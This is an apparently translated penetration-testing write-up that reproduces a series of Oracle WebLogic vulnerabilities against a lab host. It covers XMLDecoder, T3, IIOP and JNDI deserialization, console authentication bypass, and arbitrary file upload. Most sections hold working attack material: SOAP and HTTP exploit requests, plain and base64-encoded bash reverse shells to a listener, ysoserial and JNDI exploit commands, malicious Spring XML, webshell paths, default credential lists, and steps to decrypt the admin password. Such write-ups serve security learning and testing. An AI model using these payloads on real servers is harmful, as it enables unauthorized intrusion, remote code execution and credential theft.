0x01: Weblogic environment setup
Installation package, if you need different versions, you can download it directly from the official website
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
Double click to open
Click Next
Set account password, Oracle@123
Go to the directory and double-click
Enter account password
Then access port 7001
Successfully built
0x02: WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-10271)
1. Vulnerability Principle
? The cause of the CVE-2017-10271 vulnerability is that the Weblogic WLS Security component provides webservice services to the outside world, which uses XMLDecoder to parse the XML data passed in by the user. During the parsing process, a deserialization vulnerability occurs, resulting in the execution of arbitrary commands. . Attackers can even gain permissions by sending carefully constructed xml data through a rebound shell.
2. Affected version
10.3.6.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0
3. Vulnerability address
Default port: 7001 /wls-wsat/CoordinatorPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/ParticipantPortType /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationPortTypeRPC /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/RegistrationRequesterPortType /wls-wsat/RegistrationRequesterPortType11
4. Vulnerability Recurrence
Version number 10.3.6.0
Preliminary judgment, access to 192.168.88.133:7001/wls-wsat/CoordinatorPortType
and the following image may contain a vulnerability.
A similar page will appear when accessing the vulnerability path above. We use the data packet to verify whether the vulnerability exists.
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.88.133:7001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: ADMINCONSOLESESSION=llYJhP8TvzYxpGhV4LFc1l6QS7PpryrXbZkDy5H86nLSxspLvWhq!-2109495751 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: text/xml Content-Length: 596 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <void method="println"> <string> <![CDATA[ <% out.print("hello"); %> ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
The return value is 500.
access
http://192.168.88.133:7001/bea_wls_internal/test.jsp
Successfully written, there is a vulnerability
Then bounce the shell. Data under POS
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i & amp;gt; & amp;amp; /dev/tcp/192.168.88.133/8888 0 & amp;gt; & amp;amp;1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/>
Start monitoring.
Return to shell successfully
0x03: Weblogic WLS Core Components deserialization command execution vulnerability (CVE-2018-2628)
1. Vulnerability Principle
? In WebLogic, the attacker uses other rmi to bypass weblogic blacklist restrictions, and then uses readObject
to parse the loaded content, causing a deserialization remote code execution vulnerability. This vulnerability is mainly due to T3 The service is triggered. All open weblogic console port 7001 will enable the T3 service by default. The attacker can obtain the permissions of the target server by sending the constructed T3 protocol data.
? The server monitors ysoserial. The above reflection code is integrated into the payload of CommonsCollections in the ysoserial tool. In the end, it is still sun.reflect.annotation.AnnotationInvocationHandler. The payload generated by the attack end is sent to the weblogic deserialization connection server. The server sends the malicious serialization code to weblogic, and weblogic then deserializes it to implement the attack.
? In resolveProxyClass in InboundMsgAbbrev, resolveProxyClass handles the rmi interface type, and only java.rmi.registry.Registry is judged, which will cause any rmi interface to be bypassed. The core part is JRMP (Java Remote Method protocol). In this PoC, a RemoteObjectInvocationHandler will be serialized. It will use UnicastRef to establish a tcp connection to the remote end to obtain the RMI registry, load it back, and then use readObject to parse, thereby deserializing the remote code. implement.
2. Affected version
weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 weblogic 12.2.1.3
3. Vulnerability Recurrence
We first use nmap to scan whether the t3 protocol is used
Use ysoserial to start a JRMP Server service
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "touch /tmp/1.txt"
Use the cve-2018-2628.py script to send data packets to the target Weblogic. Here cve-2018-2628.py and ysoserial-0.0.6-SNAPSHOT-BETA-all.jar are placed in the same directory for use.
python CVE-2018-2628.py 192.168.88.133 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.88.133 9999 JRMPClient
File written successfully on target machine
Rebound shell
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA + JjE=}|{base64,-d }|{bash ,-i}"
Directly use automated tools to get it right in one step. After a vulnerability is detected
get shell
Rebound shell
bounce back to shell
0x04: Weblogic Unauthorized Access + Arbitrary File Upload Vulnerability (CVE-2018-2894)
1. Vulnerability Principle
? Two unauthorized pages on the Weblogic management side have the vulnerability of uploading jsp files arbitrarily, thereby obtaining server permissions. Oracle has fixed an arbitrary file upload vulnerability in Weblogic Web Service Test Page. Web Service Test Page is not enabled by default in production mode’, so this vulnerability has certain limitations. The two pages are /ws_utc/begin.do
and /ws_utc/config.do
.
2. Affected version
weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 weblogic 12.2.1.3
3. Vulnerability Recurrence
Unauthorized access to /ws_utc/config.do page
Set the directory to the static file css directory of the ws_utc application. No permission is required to access this directory. Set the Work Home Dir to
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
Then click Security -> Add on the left, and then upload webshell:
The final file name is timestamp_filename
Then visit http://192.168.88.133:7001/ws_utc/css/config/keystore/1628662540500_JspSpy.jsp
to execute webshell
0x05: Weblogic Unauthorized Access + Remote Command Execution Vulnerability (CVE-2020-14882 &CVE-2020-14883)
1. CVE-2020-14883: Permission Bypass Vulnerability
A remote attacker can craft special HTTP
requests to take over the WebLogic Server Console
without authentication.
2. CVE-2020-14882: Code Execution Vulnerability
Combined with the CVE-2020-14883
vulnerability, a remote attacker can construct a special HTTP
request to take over the WebLogic Server Console
without authentication. > and execute arbitrary code in WebLogic Server Console
.
3. Affected version
Weblogic 10.3.6.0.0 Weblogic 12.1.3.0.0 Weblogic 12.2.1.3.0 Weblogic 12.2.1.4.0 Weblogic 14.1.1.0.0
4. Vulnerability Recurrence
we visit
http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true & amp;_pageLabel=AppDeploymentsControlPage & amp;handle=com.bea.console.handles.JMXHandle( "com.bea:Name=base_domain,Type=Domain")
Jump directly to the management console
The permissions at this time are very low and applications cannot be installed in the background, so it needs to be combined with the CVE-2020-14883 vulnerability. There are two ways to exploit this vulnerability.
-
One is through
com.tangosol.coherence.mvel2.sh.ShellSession
-
The second is through
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
Use com.tangosol.coherence.mvel2.sh.ShellSession
to execute commands
http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true & amp;_pageLabel=HomePage1 & amp;handle=com.tangosol.coherence.mvel2.sh. ShellSession("java.lang.Runtime.getRuntime().exec('touch /tmp/fuck');");
File created successfully
This exploitation method can only be used in Weblogic 12.2.1 or above, because the com.tangosol.coherence.mvel2.sh.ShellSession
class does not exist in version 10. Use com.bea.core. When repackaging.springframework.context.support.FileSystemXmlApplicationContext
class, you need to construct a malicious xml file. Construct malicious XML
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http: //www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>/bin/bash</value> <value>-c</value> <value><![CDATA[bash -i > & amp; /dev/tcp/192.168.88.133/1234 0> & amp;1]]></value> </list> </constructor-arg> </bean> </beans>
Then issue the following request through this class, allowing Weblogic to load this xml, execute the commands in it, and successfully bounce back to the shell.
http://192.168.88.133:7001/console/css/%2E%2E%2Fconsole.portal?_nfpb=true & amp;_pageLabel= & amp;handle=com.bea.core.repackaged.springframework.context .support.FileSystemXmlApplicationContext("http://192.168.88.133:8888/1.xml")
0x06: Weblogic frontend any file reading & amp; & amp; weak password & amp; & amp; background getshell
1. Read any file
There are weak passwords in this environment:
-
weblogic
-
Oracle@123
Visit
http://your-ip:7001/hello/file.jsp?path=/etc/passwd
to see that the passwd file is successfully read.
Then we can read the background user ciphertext and key file. The weblogic password is encrypted using AES (old version 3DES). The symmetric encryption can be decrypted. We only need to find the user’s ciphertext and encryption key. These two files are located under base_domain and are named SerializedSystemIni.dat
and config.xml
. In this environment, they are ./security/SerializedSystemIni.dat
code> and ./config/config.xml
(based on the current directory /root/Oracle/Middleware/user_projects/domains/base_domain
). SerializedSystemIni.dat
is a binary file, so it must be read with burpsuite. Direct downloading with a browser may introduce some interfering characters. Select the string of garbled characters read in burp, right-click copy to file to save it as a file:
config.xml
is the global configuration file of base_domain, so there is a lot of messy content. Find the value of
, which is the encrypted value. Administrator password, don’t get it wrong:
Then use the tools in the shooting range decrpty to decrypt it.
2. Commonly used Weblogic weak passwords
system:password weblogic:weblogic admin:security joe:password mary:password system:security wlcsystem:wlcsystem wlpisystem:wlpisystem
3. Upload war package GetShell in the background
3.1 war introduction
- War is a web module that can be run directly. It is usually used for websites and is packaged and deployed into a container. After the war package is placed in the web directory, it can be automatically decompressed, which is equivalent to publishing.
- To put it simply, the war package is a package of JavaWeb program. The war package includes the class files compiled by the written code, dependent packages, configuration files, and all website pages, including html, jsp, etc. A war package can be understood as a web project, which contains all the items of the project.
3.2 war packaging
- Pack files into war compressed packages under linux
jar -cvf blog.war *
- View example.war
jar -tf blog.war
-
You can also compress the file into zip first, and then change the suffix to war.
Click to deploy
Click to upload file
Then upload the war package and continue to the next step and then complete. Then Ice Scorpion connects
http://192.168.88.133:7001/shell/shell.jsp
0x07: Weblogic IIOP protocol deserialization RCE (CVE-2020-2551)
1. Vulnerability Principle
? The Weblogic IIOP protocol is enabled by default and listens on port 7001 together with the T3 protocol. The main reason for this vulnerability is the incorrect filtering of the JtaTransactionManager class. The parent class of JtaTransactionManager, AbstractPlatformTransactionManager, was added to the blacklist in the previous patch. The T3 protocol uses The resolveClass method is used to filter. The resolveClass method will read the parent class, so there is no problem with T3 protocol filtering in this way. However, although the blacklist is also used in the IIOP protocol, it is not judged using the resolveClass method. By default, only the class name of this class is judged. The JtaTransactionManager class is not in the blacklist and there is jndi injection.
2. Affected version
Use marshalsec to launch a malicious RMI service.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.133:8888/#Exploit" 9999
Compile EXP locally, and then start a web server locally
exp
import java.io.IOException; public class Exploit { static{ try { java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"}); } catch (IOException e) { e.printStackTrace(); } } public static void main(String[] args) { \t\t } }
compile
javac Exploit.java
Run jar package from command line
java -jar weblogic_CVE_2020_2551.jar 192.168.88.133 7001 rmi://192.168.88.133:1099/Exploit
Reproduction failed. . .
0x08: Weblogic remote code execution vulnerability (CVE-2021-2109)
Principle of vulnerability
The vulnerability is a remote code execution vulnerability in Weblogic. The vulnerability is mainly injected by JNDI, allowing attackers to exploit this vulnerability for remote code execution.
1. Affected version
10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 14.1.1.0.0
2. Vulnerability Recurrence
Reference link https://mp.weixin.qq.com/s/-ExbVwY7K3fY07h-KP4DEA
Docker is used here to build the environment
docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
Visit http://your-ip:49163/console to see the page, User: weblogic Pass: welcome1
Start LDAP
java -jar JNDIExploit-v1.11.jar -i 192.168.88.133
Then send the packet
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88;133:1389/Basic/ WeblogicEcho;AdminServer") HTTP/1.1 Host: 192.168.88.133:49163 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate cmd:bash -c {echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA + JjE=}|{base64,-d}|{bash,-i} Connection: close Referer: http://192.168.88.133:49163/console/console.portal?_nfpb=true & amp;_pageLabel=HomePage1 Cookie: ADMINCONSOLESESSION=5ZY9z_8Wg654bjnM0Hmf8bqUjHKmT7Drs0qIkallCxuU154ML2u5!692946862 If-Modified-Since: Wed, 21 May 2014 19:34:20 GMT Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 0
bounce back to shell
2.1 Coordinating with unauthorized access
Cooperate with Weblogic unauthorized scope command execution /console/css/../consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88.133:1389/Basic/WeblogicEcho ;AdminServer") You can use this POC to log in to the backend. If you are not authorized, use the above one. /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho; AdminServer")
GET /console/css/%2e%2e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral & amp;_nfpb=true & amp;JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88 ;133:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1 Host: 192.168.88.133:49163 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.88.133:49163/console/login/LoginForm.jsp cmd:id Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
0x09: Weblogic T3 deserialization (CVE-2021-2394)
1. Vulnerability Recurrence
Here we borrow the environment of cve-2020-14882
The command is as follows: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/aaa.txt" -A 192.168.88.133 -C [command to execute] -A [Open the ip of the ldap service]
outsourcing
File created successfully
Rebound shell, remember to encode.
0x10: Several ways to write shell in weblogic
? For deserialization vulnerabilities, if you obtain system permissions or root permissions, there is no need to upload the Trojan, but if you only have permissions to install applications on the web, upload them to obtain greater permissions. Uploading requires finding several points to obtain the physical path, such as the following three:
1. Method 1: Write webshell in console images
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp
2. Method 2: Write to the uddiexplorer directory
\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\random characters\war\shell.jsp
Visit `http://*.*.*.*:7001/uddiexplorer/shell.jsp
3. Method 3: Write in the application installation directory
\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\project name\random characters\war\shell.jsp
Visit `http://*.*.*.*:7001/project name/shell.jsp
Reference link
https://xz.aliyun.com/t/10365
https://cloud.tencent.com/developer/article/1861375
https://python.iitter.com/other/130547.html